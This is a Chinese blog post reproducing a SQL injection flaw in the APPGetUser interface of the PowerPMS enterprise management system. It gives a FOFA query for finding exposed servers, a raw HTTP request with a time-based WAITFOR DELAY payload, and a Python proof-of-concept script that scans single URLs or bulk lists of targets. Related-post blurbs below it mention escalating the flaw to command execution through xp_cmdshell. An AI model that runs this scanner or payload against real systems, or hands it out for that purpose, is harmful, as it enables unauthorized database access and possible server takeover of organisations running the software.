【漏洞复现】PowerPMS——APPGetUser——SQL注入

最新推荐文章于 2024-08-10 17:55:55 发布
最新推荐文章于 2024-08-10 17:55:55 发布
阅读量435 收藏 6
点赞数 5
分类专栏: 漏洞复现 文章标签: sql 网络安全 渗透测试 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LongL_GuYu/article/details/141023892
版权

声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。

文章目录

漏洞描述

PowerPMS 是一个集成的企业管理系统,涵盖了财务管理、销售管理、采购管理、仓储管理、项目管理等多个模块。该系统采用模块化设计,可根据企业需求进行灵活配置和二次开发。PowerPMS 具有用户友好的界面和操作流程,可帮助企业高效地管理各项业务活动。该系统支持多公司、多仓库、多币种等功能,满足不同规模企业的管理需求。其接口APPGetUser存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。

漏洞复现

1)信息收集
fofa:title=“PowerPMS用户登录”
![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/eb735544fb1d488f8f53151d07254006.png
默默的看着你,听说你,思念你,但我能做到的也仅仅如此了。
在这里插入图片描述
2)构造数据包

GET /APPAccount/APPGetUser?name=1');WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close

**加粗样式**
使服务器延时响应,验证成功确实存在sql注入。

测试工具

poc

import requests
import urllib3
from urllib.parse import urljoin,quote
import argparse
import ssl
import re
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def read_file(file_path):
    with open(file_path, 'r') as file:
        urls = file.read().splitlines()
    return urls

def check(url):
    url = url.rstrip("/")
    target = urljoin(url,"/APPAccount/APPGetUser?name=1');WAITFOR DELAY '0:0:5'--+")
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
    }
    try:
        response = requests.get(target, verify=False, headers=headers, timeout=15)
        if response.status_code == 200 and 5 < response.elapsed.total_seconds() < 10:
            print(f"\033[31mDiscovered:{url}: PowerPMS_APPGetUser_SQLInject!\033[0m")
            return True
    except Exception as e:
        pass


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="URL")
    parser.add_argument("-f", "--txt", help="file")
    args = parser.parse_args()
    url = args.url
    txt = args.txt
    if url:
        check(url)
    elif txt:
        urls = read_file(txt)
        for url in urls:
            check(url)
    else:
        print("help")

运行截图
在这里插入图片描述

一件事物与其自身完全一致

Long._.L
关注
  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
上海普华PowerPMS系统 APPGetUser接口SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
08-06 87
上海普华PowerPMS系统 APPGetUser 接口处存在SQL注入漏洞,未经身份验证的远程攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。
普华-PowerPMS APPGetUser SQL注入致RCE漏洞复现
0xSec
08-05 810
普华-PowerPMS APPGetUser 接口处存在SQL注入漏洞,未经身份验证的远程攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
1day 普华 PowerPMS 敏感信息泄露漏洞
weixin_43167326的博客
06-05 1014
普华 PowerPMS 敏感信息泄露,未经身份验证的攻击者可利用此问题,获取服务器权限。
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 797
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
普华项目计划执行反馈软件
07-17
实现个人工作任务的获取与执行状态反馈,通过移动终端(支持Apple和Android操作系统)、邮件系统与项目专业计划管理模块进行互动,实现项目专业计划任务的派发与执行反馈功能。
PowerManagerService分析(一)
程序员Android
01-07 568
极力推荐Android 开发大总结文章:欢迎收藏程序员Android 力荐 ,Android 开发者需要的必备技能文章转载于网络,原文如下:https://blog.cs...
漏洞复现】普华-PowerPMS APPGetUser SQL注入漏洞
weixin_54799594的博客
08-09 792
漏洞复习记录
HW漏洞威胁情报第十三天|HW情报
weixin_43167326的博客
08-06 1388
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
中国式计划编制与展示软件Power Highlight
07-08
作为一款由中国本土企业——上海普华科技发展股份有限公司自主研发的项目管理软件,Power Highlight集成了多种先进的规划和展示技术,旨在为用户提供全面、直观的项目计划编制和控制手段。本文将深入探讨Power ...
SQL Server 事务
a876106354的博客
08-09 442
SQL Server 事务是数据库操作的一个基本特性,它允许你将一系列数据库操作组合成一个原子单元,这个单元中的所有操作要么全部成功,要么全部失败。事务具有以下四个重要的属性,通常被称为ACID属性。
SQL Zoo 8+.NSS Tutorial
weixin_61524392的博客
08-09 637
以下数据来自。
MyBatis 如何通过拦截器修改 SQL
Hello World
08-03 528
假如我们想实现多租户,或者在某些 SQL 后面自动拼接查询条件。在开发过程中大部分场景可能都是一个查询写一个 SQL 去处理,我们如果想修改最终 SQL 可以通过修改各个 mapper.xml 中的 SQL 来处理。但实际过程中我们可能穿插着 ORM 和 SQL 的混合使用,隐藏在代码中不容易被发现,还有假如项目中有很多很多的 SQL 我们不可能一个一个的去修改解决。这个时候我们就需要通过 mybatis 拦截 SQL 并且最终修改 SQL。实现Interceptor接口,并写相关逻辑。
sqllab靶场练习第1~15关
qq_64951792的博客
08-06 941
sqllab第1-15关
达梦数据库(十) -------- mybatis-plus 整合达梦时,自动生成的 sql 语句报错
weixin_52466601的博客
08-09 340
问题原因:mybatis-plus 生成的 sql 语句字段是小写的,同时还包含数据库关键字。框架会默认加上(`)符号,该符号在达梦数据库中无法被识别,需要更换为 (")。方案二:修改实体类的字段名称避免使用达梦数据库关键字。
sqliabs靶场练习
Zombie_QP的博客
08-06 479
到这里咋们就可以获取当前数据名和版本号,这个就涉及mysql数据库的一些命令了。Select @@GLOBAL.VERSION 数据库版本信息。system_user() 数据库系统用户账户名称和登录主机名。@@version_compile_os——操作系统版本。这里提示我们输入数字值的ID作为参数,我们输入?current_user() 当前登录用户和登录主机名。Select VERSION() 数据库版本信息。Select @@VERSION 数据库版本信息。@@datadir——数据库路径。
sqllabs游戏
qq_63890458的博客
08-05 844
less-1:http://127.0.0.1/sqllabs/less-2/?id=1 less-2:http://127.0.0.1/sqllabs/less-2/?id=1 less-3:http://127.0.0.1/sqllabs/less-3/?id=1 less-4:http://127.0.0.1/sqllabs/less-4/?id=1%27 less-5:http://127.0.0.1/sqllabs/less-5/?id=1%27 and updatexml(1,concat(0x
NoSQL之Redis配置与优化
最新发布
weixin_63631452的博客
08-10 574
Redis (REmote DIctionary Server) 是一个开源的、高性能的键值存储系统。它支持多种数据结构,例如字符串、哈希、列表、集合、有序集合等。Redis 最初由 Salvatore Sanfilippo 在 2009 年开发,并且已经成为最流行的 NoSQL 数据库之一。Redis 不仅可以用作数据库,还可以用作缓存和消息中间件。主要特点内存存储:数据存储在内存中,这使得 Redis 能够实现非常快的数据访问速度。持久化。
powerPMS开发平台
07-27
PowerPMS是一个开发平台,用于创建和管理各种类型的项目管理系统。它提供了一套丰富的工具和功能,帮助开发人员快速构建和定制项目管理应用程序。 PowerPMS支持多种项目管理功能,包括任务管理、进度跟踪、资源分配、团队协作、文档管理等。它还提供了强大的报表和分析功能,帮助用户监控项目进展并做出有意义的决策。 开发人员可以使用PowerPMS的开放式API和插件系统,根据自己的需求进行定制和扩展。它还提供了丰富的集成选项,可以与其他常用工具和平台进行无缝集成,如JIRA、GitHub、Slack等。 总之,PowerPMS是一个强大而灵活的开发平台,旨在简化项目管理的过程并提高团队的效率和协作能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值